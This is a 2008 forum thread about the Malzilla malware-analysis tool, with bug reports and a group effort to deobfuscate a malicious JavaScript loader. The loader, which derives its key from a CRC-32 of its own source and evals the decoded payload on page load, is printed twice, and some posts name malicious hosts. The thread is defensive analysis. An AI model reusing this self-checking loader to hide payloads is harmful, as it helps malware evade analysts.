Author Topic: MalZilla  (Read 127692 times)


February 15, 2008, 01:55:06 am
Reply #15

tjs

Debugger:
I like the idea of a separate button or control to decide whether or not to use the debugger.

Cache:
I understand your point. I also don't run any AV scanners on the machines that I do analysis on. I just don't see the value of persisting the cache between sessions. It's not like the performance tradeoff is that valuable anyway (I don't mind if you have to re-download pages every time; after all, we're looking for malware, not browsing the web).

Clipboard:
I'll investigate further, but i'm not really running anything unusual on either of my analysis machines. Maybe I'm infected with something that is hooking the clipboard ;)

TJS

February 15, 2008, 02:50:02 am
Reply #16

jimmyleo

No problem. When the full-string is ready, just mention me.

And about the Clipboard Monitor problem: I've come across it sometimes under Vista. Just as I click "send to decoder", a "can't open clipboard" popup appears.

The debugger was originally a bonus.  ::) I found it in one analysis condition.

I also recommend that the clipboard feature be disabled by default, because when I use other tools it confuses me.

best regards,
jimmyleo

February 15, 2008, 06:44:31 pm
Reply #17

tjs

I'm running into a new issue with 0.9.2.1pre

I constantly paste URLs without www or http by mistake (usually IP based), causing Malzilla to throw the malformed URL msgbox, but today while trying the following IP, I got a new error:

(X) Access violation at address 004eba13 in module malzilla.exe. Read of address 00000000

Can anyone else repro this bug?
208.72.168.176/e-Z1odey0312/index.php

Thanks,
TJS

February 15, 2008, 07:22:02 pm
Reply #18

bobby

Was there anything at that address at the time you tried it, or was it a 404 error page?

If there was some content, can you please upload it for me to test?

I did have some Read of address 00000000 errors while trying to integrate the debugger.
All the errors were related to the package I use for dealing with Unicode strings:
http://mh-nexus.de/tntunicodecontrols.htm
so, not really my fault, but I can at least do something to prevent Malzilla's crash if I can localize the error you got.

February 16, 2008, 08:42:09 am
Reply #19

sowhat-x

...only 1 request here...what jimmyleo already said about clipboard monitor being disabled by default:
copy/pasting http addresses in the 'URL' box has caused me quite a bit of trouble on occasion,
I think it happens sometimes when an address is already filled in there,
and someone tries to copy/paste a partial address there (without the http prefix),
not sure, I'll have to dig a bit more to check exactly when this happens (under v0.921)  :(
And the clipboard monitor feature in 0.93 beta makes it quite a bit more confusing...  :P

February 16, 2008, 08:58:03 am
Reply #20

bobby

http://rapidshare.com/files/92273310/malzilla.zip.html

Please test the changes I made.
I will drop Clipboard Monitor in the future. I'll try to replace its functionality in some other way.

February 16, 2008, 09:10:26 am
Reply #21

sowhat-x

Ha-ha -> less than 16 minutes...this must be the fastest bugfix response I've ever seen!  ;D
Yep, at least at a first quick glance, copy/pasting URLs in this build
seems to be working in a much better and simpler way...  ::) :)

February 17, 2008, 08:59:26 am
Reply #22

bobby

Grrrr....
Take a look at the script in the attachment (pass= infected).

It is a modified Caesar cipher, which means trivial, but...
The decryption key is created on the fly, and it depends on the function length (the arguments.callee thing).

The function is full of redundant operations and variables (used nowhere), just to make the analyst mad.

That is the kind of script I mentioned a couple of posts ago:
Quote
ToDo list:

====
Lately I see a lot of scripts using arguments.callee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already know this, but...) arguments.callee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As far as I can see, a lot of the scripts I'm seeing lately use this in a way that makes the script "IE-only".
I already know what to try, I just need some time to test my idea.

Can someone help in deciphering this?
I would like to include decoding for such scripts in Malzilla.

If anyone is interested, I would like to share my findings.
Last night I tried to write a PScript for brute-forcing it, but PScript misses a lot of functions I need for this.
If I get some time today, I'll try to code a brute-forcer for this (EXE, not script).

February 18, 2008, 05:10:54 am
Reply #23

Drusepth

I'm working on analyzing the script right now (finally, something I might know how to do! :)), but I just wanted to point out that if you just want to find out what it is that the function is running, you can take a glimpse at the very end:
Code:
eval(h8TbWsRTn);}

It's going to run whatever is in the h8TbWsRTn variable (this is after it's been decrypted).  Instead, we can modify the code to just print it out to the screen:
Code:
document.write(h8TbWsRTn);}

But, this doesn't come out clean:
Quote from: Output

So right now I'm looking at the code to see how it is actually working.  It'll take a tiny bit longer than normal, since I have to look up certain syntaxes for things that the writer used that are ridiculous ("variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);") and I still don't fully understand how the deprecated .callee function works.

Anyway, first I'm just cleaning up the code.  I'm posting each step in case I make a mistake, someone else can catch it and carry on their own work from there or something.

Step 1: Get syntax back and make it look "clean" (indentation, spaces, etc)
Code:
<html>
<script language="JavaScript">
<!--
// Decoder: its key is a CRC-32 of this function's own source text (non-word characters
// stripped, upper-cased), so any change to the body other than whitespace breaks the decoding.
function nlR1sYAdQ (dp58428V3) {
  var m6K3yhq2K=arguments.callee.toString().replace(/\W/g,'').toUpperCase();
  var A7ck1Wh8H;
  var B2t331TL0;
  var NisOkeH61 = m6K3yhq2K.length;
  var Xn47RT3Sm;
  var h8TbWsRTn='';
  var PkKX3bWF0 = new Array();
  for (B2t331TL0 = 0; B2t331TL0 < 256; B2t331TL0++) {
    PkKX3bWF0[B2t331TL0]=0;
  }
  var A7ck1Wh8H = 1;
  for (B2t331TL0 = 128; B2t331TL0; B2t331TL0 >>= 1) {
    A7ck1Wh8H = (A7ck1Wh8H>>>1)^((A7ck1Wh8H&1)?3988292384:0);
    for (i5G3CC1F6=0; i5G3CC1F6 < 256; i5G3CC1F6 += (B2t331TL0 * 2)) {
      PkKX3bWF0[i5G3CC1F6 + B2t331TL0] = (PkKX3bWF0[i5G3CC1F6]^A7ck1Wh8H);
      if (PkKX3bWF0[i5G3CC1F6+B2t331TL0] < 0) {
        PkKX3bWF0[i5G3CC1F6 + B2t331TL0] += 4294967296;
      }
    }
  }
  Xn47RT3Sm = 4294967295;
  for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
    Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
  }
  var eXK5vvK0K = new Array();
  var Y37iVA85C = 2323;
  Xn47RT3Sm = Xn47RT3Sm^4294967295;
  if (Xn47RT3Sm < 0) {
    Xn47RT3Sm += 4294967296;
  }
  Xn47RT3Sm = Xn47RT3Sm.toString(16).toUpperCase();
  var sNImKPP0N = new Array();
  var NisOkeH61 = Xn47RT3Sm.length;
  for (B2t331TL0=0; B2t331TL0 < 8; B2t331TL0++) {
    var LS0E1DrB3 = NisOkeH61+B2t331TL0;
    eXK5vvK0K[B2t331TL0] = 1;
    eXK5vvK0K[B2t331TL0] = Y37iVA85C;
    if (LS0E1DrB3 >= 8) {
      LS0E1DrB3 = LS0E1DrB3 - 8;
      sNImKPP0N[B2t331TL0] = Xn47RT3Sm.charCodeAt(LS0E1DrB3);
    } else {
      sNImKPP0N[B2t331TL0] = 48;
    }
  }
  var vM4s1CVcM = 0;
  var ahE3xpv6w;
  var L3KsBg108;
  var v65y6Hs6a;
  NisOkeH61 = dp58428V3.length;
  v65y6Hs6a = NisOkeH61;
  Y37iVA85C = 1123;
  Y37iVA85C = v65y6Hs6a;
  for (B2t331TL0 = 0; B2t331TL0 < NisOkeH61; B2t331TL0 += 2){
    var QgQRdYhu8 = dp58428V3.substr(B2t331TL0, 2);
    ahE3xpv6w = parseInt(QgQRdYhu8,16);
    L3KsBg108 = ahE3xpv6w - sNImKPP0N[vM4s1CVcM];
    if (L3KsBg108 < 0) {
      L3KsBg108 = L3KsBg108 + 256;
    }
    h8TbWsRTn += String.fromCharCode(L3KsBg108);
    v65y6Hs6a++;
    Y37iVA85C = 3891;
    if (vM4s1CVcM < sNImKPP0N.length - 1) {
      vM4s1CVcM++;
      Y37iVA85C = 1092;
      eXK5vvK0K[B2t331TL0] = 20;
    } else {
      vM4s1CVcM=0;
      Y37iVA85C=B2t331TL0;
    }
  }
  eval(h8TbWsRTn);
}
//-->
</script>
<body onLoad="nlR1sYAdQ('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')">

</body>
</html>

Step 2: Replace variable names with normal ones, and remove obvious redundancy
Code:
<html>
<script language="JavaScript">
<!--
function thefunction (parameter) {
  var variable1 = arguments.callee.toString().replace(/\W/g,'').toUpperCase();
  var i, j; // Used in for loops
  var variable4 = variable1.length; // .lengths of various vars
  var variable6 = '';
  var array1 = new Array(); // 256-entry lookup table (reflected CRC-32, polynomial 0xEDB88320)
  for (i = 0; i < 256; i++) {
    array1[i] = 0;
  }
  var variable2 = 1;
  for (i = 128; i; i >>= 1) {
    variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);
    for (j = 0; j < 256; j += (i * 2)) {
      array1[j + i] = (array1[j]^variable2);
      if (array1[j+i] < 0) {
        array1[j + i] += 4294967296;
      }
    }
  }
  var variable5 = 4294967295; // CRC over every character of the function's own text
  for(variable2 = 0; variable2 < variable4; variable2++) {
    variable5 = array1[(variable5^variable1.charCodeAt(variable2))&255]^((variable5>>8)&16777215);
  }
  var array2 = new Array();
  variable5 = variable5^4294967295;
  if (variable5 < 0) {
    variable5 += 4294967296;
  }
  variable5 = variable5.toString(16).toUpperCase();
  var array3 = new Array(); // 8-byte key: the CRC as hex digits, left-padded with '0' (48)
  variable4 = variable5.length;
  for (i = 0; i < 8; i++) {
    var variable7 = variable4 + i;
    array2[i] = 1;
    array2[i] = '';
    if (variable7 >= 8) {
      variable7 = variable7 - 8;
      array3[i] = variable5.charCodeAt(variable7);
    } else {
      array3[i] = 48;
    }
  }

  var variable8 = 0; // index into the key, cycles 0..7
  var variable10;
  variable4 = parameter.length;
  var variable13 = 3891;
  var variable11 = variable4;
  for (i = 0; i < variable4; i += 2){
    var variable12 = parameter.substr(i, 2);
    variable10 = parseInt(variable12, 16) - array3[variable8]; // Caesar step: subtract the key byte
    if (variable10 < 0) {
      variable10 = variable10 + 256;
    }
    variable6 += String.fromCharCode(variable10);
    variable11++;
    if (variable8 < array3.length - 1) {
      variable8++;
      variable13 = 1092;
      array2[i] = 20;
    } else {
      variable8 = 0;
      variable13 = i;
    }
  }
  eval(variable6);
}
//-->
</script>
<body onLoad="thefunction('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')">

</body>
</html>

And now is where the drudgework of tracing each variable as it's thrown around comes in...  I think I'll save it for the morning or tomorrow. 

A few things I would like to point out about prerequisites for the string passed to the javascript function:
- It needs to be a longer string.  "hellohellohellohello" works, while "hello" returns nothing.  ("hellohe" was the shortest I could get it)
- As far as I could tell, it can have newlines passed to it.
- The line "variable10 = variable10 + 256;" is bringing in characters made up above 256, no matter what.  AKA it goes up to Unicode
http://unicode.org/charts/

February 18, 2008, 08:34:49 am
Reply #24

jimmyleo

hello bobby

I've come across this issue many times recently.
My friend dikex and I found a way to decode it in the script way we used to do.

Because it calls itself, we throw it into a variable without changing it, e.g. var a="....";
and replace "arguments.callee" with the variable.
Then we can do what we want to do, e.g. replace eval() with the ... method.

have fun!

best regards,
jimmyleo

February 18, 2008, 04:17:57 pm
Reply #25

bobby

Hi Drusepth, hi jimmyleo,

You can't make any single change in the script because it does not check only the length of the function, but it checks every single character:
Code:
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
  Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}

So, if Xn47RT3Sm does not have the expected value at the end of the loop, it means something has changed in the script, and the decoding will not succeed. Only with the proper value of this variable will the data decode like it should.

So, I asked on another board for advice, and I was told to use the oldest trick in decoding: override the eval() function.
JavaScript allows re-defining every internal function, so just add this line at the beginning of the script:
Code:
function eval(a) {document.write(a)};

This is a re-definition of the eval() function, so eval will in fact call document.write.

This is the only working method for this kind of script.

If you use this on another script, just be sure that the script does not do another overriding of eval() (or of any other internal function) after your overriding.

best regards
bobby
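An added example, not code from the thread or from Malzilla: it reproduces the key schedule implemented by the listing in Drusepth's Step 1 and checked per character in bobby's loop above, on a constructed stand-in for the loader's source text (the names `loader`, `decode` and the sample payload are assumptions). The checks show why whitespace edits, a stored copy of the unchanged text, or an eval override leave the key intact, while renaming an identifier changes it.

```javascript
// Added example, not code from the thread: the key schedule of the sample script.
// Its table loop is a plain reflected CRC-32 (polynomial 0xEDB88320).
function crc32(str) {
  const table = new Array(256).fill(0);
  let c = 1;
  for (let i = 128; i; i >>= 1) {          // bit-by-bit table build, as in the script
    c = (c >>> 1) ^ ((c & 1) ? 0xEDB88320 : 0);
    for (let j = 0; j < 256; j += i * 2) table[j + i] = (table[j] ^ c) >>> 0;
  }
  let crc = 0xFFFFFFFF;
  for (let k = 0; k < str.length; k++) {
    crc = table[(crc ^ str.charCodeAt(k)) & 255] ^ ((crc >> 8) & 0xFFFFFF);
  }
  return (crc ^ 0xFFFFFFFF) >>> 0;
}
// Key = CRC-32 of the function's own text with all non-word characters stripped and
// upper-cased, written as 8 upper-case hex digits (left-padded with '0' = 48), as char codes.
function deriveKey(fnSource) {
  const hex = crc32(fnSource.replace(/\W/g, '').toUpperCase()).toString(16).toUpperCase();
  return Array.from(hex.padStart(8, '0'), ch => ch.charCodeAt(0));
}
// Payload is hex pairs; plaintext byte = (pair - key[i mod 8]) mod 256, a rotating Caesar shift.
function decode(payloadHex, key) {
  let out = '';
  for (let i = 0, k = 0; i < payloadHex.length; i += 2, k = (k + 1) % key.length) {
    out += String.fromCharCode((parseInt(payloadHex.substr(i, 2), 16) - key[k] + 256) % 256);
  }
  return out;
}
function encode(plain, key) {                 // inverse, used only to build the sample
  let out = '';
  for (let i = 0; i < plain.length; i++) {
    out += ((plain.charCodeAt(i) + key[i % key.length]) % 256).toString(16).padStart(2, '0');
  }
  return out;
}
// Constructed stand-in for the loader's source text (hypothetical names, not the real script).
const SOURCE = "function loader(p){var k=arguments.callee.toString();eval(decode(p,k));}";
const REINDENTED = "function loader (p) {\n  var k = arguments.callee.toString();\n  eval(decode(p, k));\n}";
const RENAMED = SOURCE.replace(/loader/g, 'thefunction');
function demo() {
  const key = deriveKey(SOURCE);
  const payload = encode("document.write('constructed sample')", key);
  return {
    roundTrip: decode(payload, key),
    sameAfterReindent: deriveKey(REINDENTED).join() === key.join(), // \W drops whitespace
    sameAfterRename: deriveKey(RENAMED).join() === key.join(),      // any identifier edit changes the CRC
  };
}
```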

February 19, 2008, 07:42:54 am
Reply #26

jimmyleo

Quote
because it does not check only the length of the function, but it checks every single character:

oh, bobby:
You may not have looked at my reply carefully. :P
Quote
so we throw it into a variable without changing

February 19, 2008, 07:11:12 pm
Reply #27

bobby

@jimmyleo

Sorry, but I do not understand, even if I read your post a couple of times.
Can you give an example showing what exactly you are doing with arguments.callee?

February 20, 2008, 02:24:15 am
Reply #28

jimmyleo

It may help you.

You can do it one step at a time until the result is revealed.

regards,
jimmyleo

February 25, 2008, 12:01:39 pm
Reply #29

tjs

I have a bug and feature suggestion related to the 'send to decoder' feature:

* send script to decoder breaks when a script src is closed, e.g.:
   <script src="poked.js" language="JavaScript"></script>
   malzilla thinks the script starts after </script> till EOF

* send script to decoder can be improved on pages with multiple <script>
   <script>foo;</script><script>bar;</script>
   it would be nice to have a feature to send ALL scripts to decoder

Example malware site exploiting both of these limitations:
hxxp://pokerfinds.com

Thanks,
TJS
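An added example (not Malzilla's own code) of the script extraction the report above asks for: a closed `<script src>` tag yields an empty inline body instead of swallowing the rest of the page, and every `<script>` block is collected so all of them can be sent to the decoder at once; the sample page is constructed from the two tags quoted above.

```javascript
// Added example, not Malzilla's code: collect every <script> on a page so that
// <script src="..."></script> does not make the rest of the file look like script.

// One <script ...>...</script> pair, non-greedy; group 1 = attributes, group 2 = body.
const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;

function extractScripts(html) {
  const scripts = [];
  let m;
  SCRIPT_RE.lastIndex = 0;
  while ((m = SCRIPT_RE.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2].trim() });
  }
  return scripts;
}

// "Send ALL scripts to decoder": the inline bodies, in page order, joined as one script.
function inlineScripts(html) {
  return extractScripts(html).filter(s => s.body.length > 0).map(s => s.body).join('\n');
}

// Constructed sample page built from the two cases in the bug report.
const SAMPLE_PAGE =
  '<html><head><script src="poked.js" language="JavaScript"></script></head>' +
  '<body><script>foo;</script><script>bar;</script></body></html>';
```

A regex is not an HTML parser: a page that splits or encodes its tags will need the browser's own DOM, but for the two cases reported here it recovers exactly the three blocks.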